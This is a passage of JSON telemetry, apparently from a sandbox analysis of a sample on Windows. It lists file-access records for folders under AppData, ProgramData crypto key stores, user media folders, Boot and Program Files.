[], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\office\\12.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Office\\ONetConfig", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\office\\onetconfig", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Outlook", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\outlook", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\TaskSchedulerConfig", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\taskschedulerconfig", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Visio", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\visio", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\1033", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\1033", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Burn", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\burn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\burn\\burn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn1", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\burn\\burn1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Burn\\Burn2", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\burn\\burn2", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Caches", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\caches", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\Explorer", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\explorer", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\GameExplorer", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\gameexplorer", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\History", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\history", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\history\\history.ie5", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101720171018", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012017101720171018", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\Deployment", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\deployment", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\hsperfdata_kFT6uTQW", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\hsperfdata_kft6utqw", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\lilo.144", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\lilo.144", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\Low", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\low", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\Microsoft .NET Framework 4 Setup_4.0.30319", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\microsoft .net framework 4 setup_4.0.30319", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.40219", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\microsoft visual c++ 2010 x64 redistributable setup_10.0.40219", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.40219", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\microsoft visual c++ 2010 x86 redistributable setup_10.0.40219", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\outlook logging", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\outlook logging", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\Setup000006d8", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\setup000006d8", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\WPDNSE", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\wpdnse", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\~nsu.tmp", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temp\\~nsu.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\Temporary Internet Files", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\temporary internet files", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Local\\VirtualStore", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\local\\virtualstore", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Adobe", "hashes": [], "norm_filename": "c:\\programdata\\adobe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Adobe\\Acrobat", "hashes": [], "norm_filename": "c:\\programdata\\adobe\\acrobat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Adobe\\Acrobat\\10.0", "hashes": [], "norm_filename": "c:\\programdata\\adobe\\acrobat\\10.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate", "hashes": [], "norm_filename": "c:\\programdata\\adobe\\acrobat\\10.0\\replicate", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security", "hashes": [], "norm_filename": "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Adobe\\ARM", "hashes": [], "norm_filename": "c:\\programdata\\adobe\\arm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", "hashes": [], "norm_filename": "c:\\programdata\\adobe\\arm\\reader_10.0.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\10412", "hashes": [], "norm_filename": "c:\\programdata\\adobe\\arm\\reader_10.0.0\\10412", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Application Data", "hashes": [], "norm_filename": "c:\\programdata\\application data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Desktop", "hashes": [], "norm_filename": "c:\\programdata\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Documents", "hashes": [], "norm_filename": "c:\\programdata\\documents", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Favorites", "hashes": [], "norm_filename": "c:\\programdata\\favorites", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft", "hashes": [], "norm_filename": "c:\\programdata\\microsoft", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Assistance", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\assistance", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Assistance\\Client", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\assistance\\client", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\assistance\\client\\1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Crypto", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\crypto", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Crypto\\DSS", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\crypto\\dss", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Crypto\\Keys", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\crypto\\keys", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Crypto\\RSA", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\crypto\\rsa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Device Stage", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\device stage", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Device Stage\\Device", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\device stage\\device", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Microsoft\\Device Stage\\Task", "hashes": [], "norm_filename": "c:\\programdata\\microsoft\\device stage\\task", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\hGZFj", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\hgzfj", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\TmdCgSua1hPeIxp_g-_", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\vuewIfEOk", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\oGal6NmV2cY0e3 6", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\D XgP5yxO", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\d xgp5yxo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\miHhH", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\mihhh", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\_bCyujY", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\_bcyujy", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\Eyqf5KSeCaMN6njljm", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\eyqf5ksecamn6njljm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\LNVGgurmVCVr5ekCq-4", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\lnvggurmvcvr5ekcq-4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\uXWBnEhIHTl8W", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\uxwbnehihtl8w", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\WQHnOCgB21aCcC", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\wqhnocgb21accc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\IjyI ku9gKWYYPFGATz", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\r-_fU8vdku2TwrL", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM\\cNh", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\N DTF4xE4-dKUqMoR", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\n dtf4xe4-dkuqmor", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\_KMnL2J", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\_kmnl2j", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Favorites", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\favorites", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Favorites\\Links", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\favorites\\links", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Favorites\\Microsoft Websites", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\favorites\\microsoft websites", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Favorites\\MSN Websites", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\favorites\\msn websites", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Favorites\\Windows Live", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\favorites\\windows live", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Documents", "hashes": [], "norm_filename": "c:\\users\\public\\documents", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Documents\\My Music", "hashes": [], "norm_filename": "c:\\users\\public\\documents\\my music", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Documents\\My Pictures", "hashes": [], "norm_filename": "c:\\users\\public\\documents\\my pictures", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Documents\\My Videos", "hashes": [], "norm_filename": "c:\\users\\public\\documents\\my videos", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures", "hashes": [], "norm_filename": "c:\\users\\public\\pictures", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Pictures\\Sample Pictures", "hashes": [], "norm_filename": "c:\\users\\public\\pictures\\sample pictures", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music", "hashes": [], "norm_filename": "c:\\users\\public\\music", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Music\\Sample Music", "hashes": [], "norm_filename": "c:\\users\\public\\music\\sample music", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Videos", "hashes": [], "norm_filename": "c:\\users\\public\\videos", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Videos\\Sample Videos", "hashes": [], "norm_filename": "c:\\users\\public\\videos\\sample videos", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\Public\\Desktop", "hashes": [], "norm_filename": "c:\\users\\public\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\$Recycle.Bin", "hashes": [], "norm_filename": "c:\\$recycle.bin", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\$Recycle.Bin\\S-1-5-21-1534390919-4215197118-2202912847-1000", "hashes": [], "norm_filename": "c:\\$recycle.bin\\s-1-5-21-1534390919-4215197118-2202912847-1000", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot", "hashes": [], "norm_filename": "c:\\boot", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\cs-CZ", "hashes": [], "norm_filename": "c:\\boot\\cs-cz", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\da-DK", "hashes": [], "norm_filename": "c:\\boot\\da-dk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\de-DE", "hashes": [], "norm_filename": "c:\\boot\\de-de", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\el-GR", "hashes": [], "norm_filename": "c:\\boot\\el-gr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\en-US", "hashes": [], "norm_filename": "c:\\boot\\en-us", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\es-ES", "hashes": [], "norm_filename": "c:\\boot\\es-es", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\fi-FI", "hashes": [], "norm_filename": "c:\\boot\\fi-fi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\Fonts", "hashes": [], "norm_filename": "c:\\boot\\fonts", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\fr-FR", "hashes": [], "norm_filename": "c:\\boot\\fr-fr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\hu-HU", "hashes": [], "norm_filename": "c:\\boot\\hu-hu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\it-IT", "hashes": [], "norm_filename": "c:\\boot\\it-it", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\ja-JP", "hashes": [], "norm_filename": "c:\\boot\\ja-jp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\ko-KR", "hashes": [], "norm_filename": "c:\\boot\\ko-kr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\nb-NO", "hashes": [], "norm_filename": "c:\\boot\\nb-no", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\nl-NL", "hashes": [], "norm_filename": "c:\\boot\\nl-nl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\pl-PL", "hashes": [], "norm_filename": "c:\\boot\\pl-pl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\pt-BR", "hashes": [], "norm_filename": "c:\\boot\\pt-br", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\pt-PT", "hashes": [], "norm_filename": "c:\\boot\\pt-pt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\ru-RU", "hashes": [], "norm_filename": "c:\\boot\\ru-ru", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\sv-SE", "hashes": [], "norm_filename": "c:\\boot\\sv-se", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\tr-TR", "hashes": [], "norm_filename": "c:\\boot\\tr-tr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\zh-CN", "hashes": [], "norm_filename": "c:\\boot\\zh-cn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\zh-HK", "hashes": [], "norm_filename": "c:\\boot\\zh-hk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Boot\\zh-TW", "hashes": [], "norm_filename": "c:\\boot\\zh-tw", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Documents and Settings", "hashes": [], "norm_filename": "c:\\documents and settings", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\MSOCache", "hashes": [], "norm_filename": "c:\\msocache", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\PerfLogs", "hashes": [], "norm_filename": "c:\\perflogs", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files", "hashes": [], "norm_filename": "c:\\program files", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files", "hashes": [], "norm_filename": "c:\\program 